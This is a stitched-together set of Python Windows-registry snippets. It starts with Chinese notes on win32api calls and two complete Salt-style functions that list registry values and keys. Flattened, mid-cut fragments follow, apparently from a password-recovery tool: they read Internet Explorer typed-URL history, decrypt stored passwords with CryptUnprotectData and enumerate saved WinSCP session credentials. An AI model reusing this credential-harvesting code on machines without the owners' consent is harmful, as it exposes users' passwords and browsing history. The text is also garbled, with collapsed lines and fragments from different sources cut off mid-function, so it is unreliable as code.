Key:已经打开的项的句柄。
subKey:所要设置的子项。
Type:项值的类型,必须为 win32con.REG_SZ。
Value:项值数据,为字符串。
win32api.RegSetValueEx(key,valueName,reserved,type,value) # 要修改或重新设置注册表某一项的项值。如果项值存在,则修改该项值,如果不存在,则添加该项值。
Key:要设置的项的句柄。
valueName:要设置的项值名称。
Reserved:保留,可以设为0。
Type:项值的类型。
Value:所要设置的值。
def list_values(hive, key=None, use_32bit_registry=False):
    """
    Enumerates the values in a registry key or hive.

    .. note::
        The ``(Default)`` value will only be returned if it is set, otherwise it
        will not be returned in the list of values.

    Args:

        hive (str):
            The name of the hive. Can be one of the following:

                - HKEY_LOCAL_MACHINE or HKLM
                - HKEY_CURRENT_USER or HKCU
                - HKEY_USERS or HKU
                - HKEY_CLASSES_ROOT or HKCR
                - HKEY_CURRENT_CONFIG or HKCC

        key (str):
            The key (looks like a path) to the value name. If a key is not
            passed, the values under the hive will be returned.

        use_32bit_registry (bool):
            Accesses the 32bit portion of the registry on 64 bit installations.
            On 32bit machines this is ignored.

    Returns:
        list: A list of values under the hive or key.

    Usage:

        .. code-block:: python

            import salt.utils.win_reg
            winreg.list_values(hive='HKLM', key='SYSTEM\\CurrentControlSet\\Services\\Tcpip')
    """
    local_hive = _to_unicode(hive)
    local_key = _to_unicode(key)

    registry = Registry()
    try:
        hkey = registry.hkeys[local_hive]
    except KeyError:
        # Unknown hive names are rejected before any registry call.
        raise CommandExecutionError("Invalid Hive: {}".format(local_hive))
    # Access mask selected by the use_32bit_registry flag.
    access_mask = registry.registry_32[use_32bit_registry]
    handle = None
    values = list()

    try:
        handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)

        # [1] of RegQueryInfoKey is the number of values under the key.
        for i in range(win32api.RegQueryInfoKey(handle)[1]):
            vname, vdata, vtype = win32api.RegEnumValue(handle, i)

            # The key's unnamed value has an empty name.
            if not vname:
                vname = "(Default)"

            value = {
                "hive": local_hive,
                "key": local_key,
                "vname": _to_mbcs(vname),
                "vtype": registry.vtype_reverse[vtype],
                "success": True,
            }
            # Only convert text types to unicode
            if vtype == win32con.REG_MULTI_SZ:
                value["vdata"] = [_to_mbcs(i) for i in vdata]
            elif vtype in [win32con.REG_SZ, win32con.REG_EXPAND_SZ]:
                value["vdata"] = _to_mbcs(vdata)
            else:
                # Every other type is passed through unchanged.
                value["vdata"] = vdata
            values.append(value)

    except win32api.error as exc:
        # winerror 2 is ERROR_FILE_NOT_FOUND: the key does not exist, and the
        # return shape becomes a (False, message) tuple.  Any other error
        # (access denied, for instance) propagates to the caller.
        if exc.winerror == 2:
            log.debug(r"Cannot find key: %s\%s", hive, key)
            return False, r"Cannot find key: {}\{}".format(hive, key)
        raise

    finally:
        # Close the handle on every path out of the function.
        if handle:
            handle.Close()
    return values
def list_keys(hive, key=None, use_32bit_registry=False):
    """
    Enumerates the subkeys in a registry key or hive.

    Args:

        hive (str):
            The name of the hive. Can be one of the following:

                - HKEY_LOCAL_MACHINE or HKLM
                - HKEY_CURRENT_USER or HKCU
                - HKEY_USERS or HKU
                - HKEY_CLASSES_ROOT or HKCR
                - HKEY_CURRENT_CONFIG or HKCC

        key (str):
            The key (looks like a path) to the value name. If a key is not
            passed, the keys under the hive will be returned.

        use_32bit_registry (bool):
            Accesses the 32bit portion of the registry on 64 bit installations.
            On 32bit machines this is ignored.

    Returns:
        list: A list of keys/subkeys under the hive or key.

    Usage:

        .. code-block:: python

            import salt.utils.win_reg
            winreg.list_keys(hive='HKLM', key='SOFTWARE\\Microsoft')
    """
    hive_name = _to_unicode(hive)
    key_path = _to_unicode(key)

    registry = Registry()
    try:
        root = registry.hkeys[hive_name]
    except KeyError:
        # Unknown hive names are rejected before any registry call.
        raise CommandExecutionError("Invalid Hive: {}".format(hive_name))
    # Access mask selected by the use_32bit_registry flag.
    sam = registry.registry_32[use_32bit_registry]

    found = []
    handle = None
    try:
        handle = win32api.RegOpenKeyEx(root, key_path, 0, sam)

        # [0] of RegQueryInfoKey is the number of subkeys.
        total = win32api.RegQueryInfoKey(handle)[0]
        for index in range(total):
            name = win32api.RegEnumKey(handle, index)
            found.append(_to_mbcs(name) if PY2 else name)

    except win32api.error as exc:
        # Only winerror 2 (key not found) is turned into a (False, message)
        # result; every other error reaches the caller unchanged.
        if exc.winerror != 2:
            raise
        log.debug(r"Cannot find key: %s\%s", hive, key, exc_info=True)
        return False, r"Cannot find key: {}\{}".format(hive, key)

    finally:
        if handle:
            handle.Close()

    return found
def history_from_regedit(self): urls = [] # open the registry accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) return [] num = win32api.RegQueryInfoKey(hkey)[1] for x in range(0, num): k = win32api.RegEnumValue(hkey, x) if k: urls.append(k[1]) return urls def decipher_password(self, cipher_text, u): pfound = [] # deciper the password pwd = self.Win32CryptUnprotectData(cipher_text, u) a = None for i in range(len(pwd)): try: a = pwd[i:].decode('UTF-16LE') a = a.decode('utf-8')
if thisName == '0': return False else: return True def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey( win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) return False num_profiles = win32api.RegQueryInfoKey(key)[0] pwdFound = [] for n in range(num_profiles): name_skey = win32api.RegEnumKey(key, n) skey = win32api.RegOpenKey(key, name_skey, 0, accessRead) num = win32api.RegQueryInfoKey(skey)[1] port = '' values = {} for nn in range(num): k = win32api.RegEnumValue(skey, nn) if k[0] == 'HostName':
for x in win32process.EnumProcessModules(h) ]: if 'delphi32.exe' in mod: return True return False # clean up old restart records key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, "Software") key = win32api.RegOpenKey(key, "Jabber") key = win32api.RegOpenKey(key, "Exodus") try: restart = win32api.RegOpenKey(key, "Restart") keys = [] for i in range(0, win32api.RegQueryInfoKey(restart)[0]): keys.append(win32api.RegEnumKey(restart, i)) for subkey in keys: win32api.RegDeleteKey(restart, subkey) win32api.RegCloseKey(restart) win32api.RegDeleteKey(key, "Restart") except: pass count = 0 while True: if count > 10: print "Could not shut down an Exodus instance" sys.exit(1) wins = []